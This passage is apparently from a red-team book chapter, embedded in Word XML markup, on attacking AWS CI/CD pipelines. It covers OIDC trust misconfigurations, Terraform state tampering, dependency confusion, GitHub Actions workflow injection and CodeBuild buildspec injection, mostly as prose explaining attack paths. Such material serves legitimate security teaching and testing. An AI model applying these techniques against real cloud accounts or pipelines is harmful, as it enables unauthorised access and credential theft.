    </w:p>
    <w:p w14:paraId="522A832B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6EE00" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  }]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315469F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12432CB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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>condition is the security boundary. Broken variants abound:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616173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 xml:space="preserve">Missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> altogether.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the trust policy does not include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition, any GitHub Actions workflow in any public or private repository on GitHub.com can assume the role. The attacker creates a public repository, writes a workflow that uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-actions/configure-aws-credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and assumes the role from their own fork. This is the most dangerous variant and it is more common than it should be; it often results from copy-pasting tutorials that use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub: *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088519BC"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 xml:space="preserve">Over-broad </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>repo:MyOrg/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows any repo in the organization; an attacker who can push to any MyOrg repo can assume the role. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>repo:MyOrg/MyRepo:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows any ref — any branch, any tag, any pull-request ref from a fork — to assume; an attacker who opens a PR from a fork can assume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538EDB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 xml:space="preserve">Missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aud: sts.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>condition, tokens intended for other audiences can be used. Rare but present in legacy configs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404EDC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Typo in provider ARN.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker who registers a new OIDC provider with a similar but attacker-controlled thumbprint can issue tokens that match a typo'd trust. This is a nation-state-level attack; it is included for completeness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22089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operator's job is to enumerate every role trusting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>token.actions.githubusercontent.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:ListRoles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + policy inspection, or CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>role-trusts --filter-oidc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>), parse each trust, and identify which are exploitable. On most engagements, at least one is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B14068" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>19.2  Terraform state as an attacker resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00B9C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Terraform state files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>terraform.tfstate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) contain every managed resource's id, attributes, and — when they flow through the provider — secrets. A single state file for an AWS-provider Terraform tree contains AWS account ids, role ARNs, KMS key ids, IAM policies, and frequently the literal contents of Secrets Manager secrets the Terraform manages. State files stored unencrypted in S3, or with weak bucket policies, are direct credential sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E526E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attack surface around Terraform state is broader than the state file itself. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a typical AWS-deployed Terraform is an S3 bucket (for the state) plus a DynamoDB table (for the lock). If the attacker can write to the state bucket (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>), they can corrupt subsequent applies to cause arbitrary resource creation. If they can write to the lock table, they can blueprint a state of "locked forever" or release a legitimate lock at the wrong moment. If they can read the state bucket (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>), they have the entire environment's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0312F4B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more sophisticated attack is to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> a malicious resource into the state and let the next </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>terraform apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> re-materialize it. Terraform will, by default, re-create resources that are in state but missing in the cloud; an attacker who adds a state entry for an IAM user with an attached admin policy, targeting an existing Terraform that does not explicitly manage IAM users, can cause the user to be created on the next apply — and the Terraform operator will not notice because the apply succeeds cleanly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0942E72D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>19.3  Dependency confusion against Lambda builds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB62E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Lambda function's dependencies (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Gemfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>go.sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) are resolved at build time, typically inside a CI pipeline. If the pipeline does not pin a private package registry, an attacker who publishes a package of the same name to a public registry (PyPI, npm) at a higher version can cause the build to fetch the attacker's package. That package then runs inside the Lambda when invoked, with the Lambda's execution role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDC8D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2021 Alex Birsan research on dependency confusion remains directly applicable. AWS-specific twists: Lambda Layers are particularly attractive targets because a single poisoned layer is imported by many functions; AWS Amplify builds are particularly vulnerable because Amplify's default build configuration does not enforce a private registry. Organizations using AWS CodeArtifact with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>package origin control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature enabled have structural protection; the majority of organizations do not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0ED2F9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>19.4  GitHub Actions workflow injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C05F6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GitHub Actions workflows executed by events from external actors (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>pull_request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>issue_comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) run with limited privileges by default, but many workflows opt into broader permissions for legitimate reasons. When such a workflow uses untrusted input unsafely — for example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>echo "${{ github.event.pull_request.title }}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>in a step that runs shell — a PR with a crafted title can inject shell commands that run in the CI environment. Those commands have access to whatever the workflow was given: a GitHub token, and frequently the AWS credentials from the OIDC trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44185D5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attacker's move, therefore, is to submit a pull request to a target repository whose workflows are vulnerable to injection, and wait for a maintainer to trigger the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> event (which runs the target-branch workflow with access to secrets). Many organizations have reduced this risk by using the CODEOWNERS-gated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and fine-grained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>permissions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> blocks; many have not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2910C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>19.5  CodeBuild, CodePipeline, and the IAM-PassRole bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44437883"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AWS-native CI (CodeBuild, CodePipeline) has its own federation surface. A CodeBuild project runs under a service role; a CodePipeline step can invoke a CodeBuild project. Any identity with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>codebuild:StartBuild</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a project whose service role is powerful has, effectively, RCE under that role. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>codebuild:UpdateProject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> pair was listed in Chapter 8 as a privilege-escalation primitive; it is also a CI-specific persistence primitive because changes to build projects are rarely audited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B731CDE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1332294059"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator note: buildspec injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A276457" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="1332294059"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeBuild projects that read their </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>buildspec.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the source S3/CodeCommit/GitHub repo are vulnerable to buildspec injection if the attacker can modify the source. If the source is GitHub and the attacker can open a PR against a branch that triggers the build, the attacker's buildspec runs under the project's service role. Even if the attacker's PR is eventually closed without merging, the build already executed.</w:t>
      </w:r>
    </w:p>
